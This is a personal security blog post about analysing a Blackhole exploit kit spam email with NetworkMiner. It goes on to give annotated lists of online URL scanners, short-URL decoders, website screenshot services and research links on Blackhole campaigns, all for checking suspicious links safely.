I tossed the pcap file I got from Anubis into NETRESEC NetworkMiner. Nothing very interesting but my Microsoft Security Essentials alerted when the HTML page was reassembled by NetworkMiner and quarantined the file. It identified the page code as being Exploit:JS/Blacole.AR. (MS’s way of saying “blackhole” I suppose…)

Here are a series of links regarding these kinds of email spam threats in general as well as Blackhole info in particular as it relates with email spam campaigns, if you are curious.

• Prevalent Exploit Kits Updated with a New Java Exploit – M86 Security Labs Blog
• An analysis of the ACH spam campaign – M86 Security Labs Blog
• Cutwail Spam Campaigns Lure Users to Blackhole Exploit Kit – M86 Security Labs Blog
• “Steve Jobs Alive!” Spam Campaign Leads To Exploit Page – M86 Security Labs Blog
• All Posts tagged Malicious Spam – M86 Security Labs Blog
• Malicious email scam “Re: Scan from a Xerox W. Pro #XXXXXXX” returns with a new face – IT Secure Site more on a related Blackhole email spam attempt.
• Blackhole exploits kit attack growing – Zscaler Research
• Exploit Kit in my Morning Email (BlackHole Exploit Kit . . . Maybe) – ReverSecurity

I doubt this is the last our email inbox will see of these things, but the whole process has been quite fun to follow.

I’ve decided to leave out links/images of the actual email and the header-code/URL (short/long) but have passed it along to a number of security-spam websites in case it is of use.

A long time ago I had a list of URL-testing sites to feed a URL into to see if they were safe or not.  Most seem to have gone away, however the following forums had a number of new ones worth bookmarking. Hat tip to “PROROOTECT” for the legwork!

• Free Online On-demand URL Security Scanners – MalwareTips forum
• FREE ONLINE SECURITY SCANS For Suspicious URL Link – Sysinternals Forums

Here is a combined and cleaned up list based on the collective work there from PROROOTECT in both places and at least one or two I’m tossing in and a few from those lists I removed that seem dead/redirected incorrectly.  PROROOTECT does make a great point that the effectiveness of these vary, so a “bad” URL in one may come back as “clean” in another. So it’s best to run your URL through multiple sources.

Note, these are URL/web-page scanners. They are a bit different than on-line file-scanners/sandboxes used to analyze malware samples. Though a few seem to come pretty darn close with the depth of their reports/analysis.

Not “necessarily” ordered in order of usefulness.

• IP Address Locator – Track IP, Search IP, Find IP, Trace IP Lookup, What Is My IP Address Location
• TrueURL – decode short URLs
• Decode Short URL Decoder – cekPR.com – decode short URLs
• TinyURL.com – preview a TinyURL
• LongURL – decode short URLs
• Untiny – decode short URLs
• base64 online encoder / decoder – decode base 64 code in emails
• Quttera – FREE Online Heuristic URL Scanner
• Anubis – Analyzing Unknown Binaries
• vURL Online – Quickly and safely dissect malicious or suspect websites
• HTTP Web-Sniffer 1.0.37 – view HTTP request/response headers
• Wepawet - analyzes URLs for javascript/PDF or Flash exploits.
• Finjan URL Analysis – URL analysis
• VirusTotal – Free Online Virus, Malware and URL Scanner
• UrlVir.com – URL scanner using domain, IP or MD5 hash value. Hosted by NoVirusThanks
• SURBL Blacklist lookup – check database for known websites that have appeared in unsolicited (spam) emails. More on the program here: SURBL
• URLVoid.com BETA – scan website for malware, threats and other bad things.
• URL & Link Scanner – Scan URLs for malicious code – URLVoid.com BETA to scan URL with multiple AV engines.
• WAVE – Web Accessibility Evaluation Tool – may not tell you if a site is “malicious” but provides a visual report on the site as well as any funky coding going on.
• Comodo Site Inspector – scan page to see if it generates malicious activity or hosts malware.
• Website Security Check – Unmask Parasites. Scans site for evidence of exploit code.
• Norton Safe Web, from Symantec – is a site safe?
• Dr.Web – is a site safe?
• Trend Micro Site Safety Center – is a site safe?
• AVG LinkScanner Online- is a site safe?
• F-Secure Browsing Protection Portal – Can you trust a site?
• AVG Online Virus Scanner | Scan Web Pages | AVG LinkScanner Drop Zone – Can you trust a site? (Aussie edition)
• Online Link Scan – Virus, Trojan, Adware and Malware Scanner using a variety of scanning engines.
• PhishTank – site to report suspicious/phishing URL sites.
• Check page for sh*t – resources including a URL check in Google spyware checker.

PROROOTECT’s suggestion to use an online URL screenshotting service to capture the displayed URL safely is some good outside the box thinking. Kinda a “look-before-you-leap” thing if all the above items pass OK.

• Shotbot – Screenshot Bot | Ascreen Generator – generates jpeg thumbnails of public websites.
• IE NetRenderer – Browser Compatibility Check - I like this one in that you can pick your browser version from a selection. If the URL/page responds differently based on your browser, then this might show it.
• thumbalizr – thumb your webpages
• url2png – website screenshot service
• loads.in – webpage load screenshots in multiple browser with option to pick from from over 50 locations worldwide
• ShrinkTheWeb – website screenshot service
• Browsershots – supports/mimics so many different browser types and OS’s and allows defining Javascript/java/flash versions that it’s just plain coolly obscene!

Fun trip if it wasn’t so serious…

–Claus V.

Update: I meant to add this in to the original post but got sidetracked. A recent Digital Forensics Case Leads post has mention of a super-fantastic investigation/forensic report involving anonymous emails. This is must-read material, not just in terms of the investigative methodology but also the way the report was composed and presented. Very clearly done!  I’m keeping a saved copy of the report for future reference; both technically and as a report template. From the post via the link above:

University of Illinois recently released a detailed investigation report (PDF) regarding anonymous emails allegedly sent by its Chief of Staff to the University’s Senates Conference. The report is an interesting read, and also serves as a potentially useful model for those looking for report samples and templates.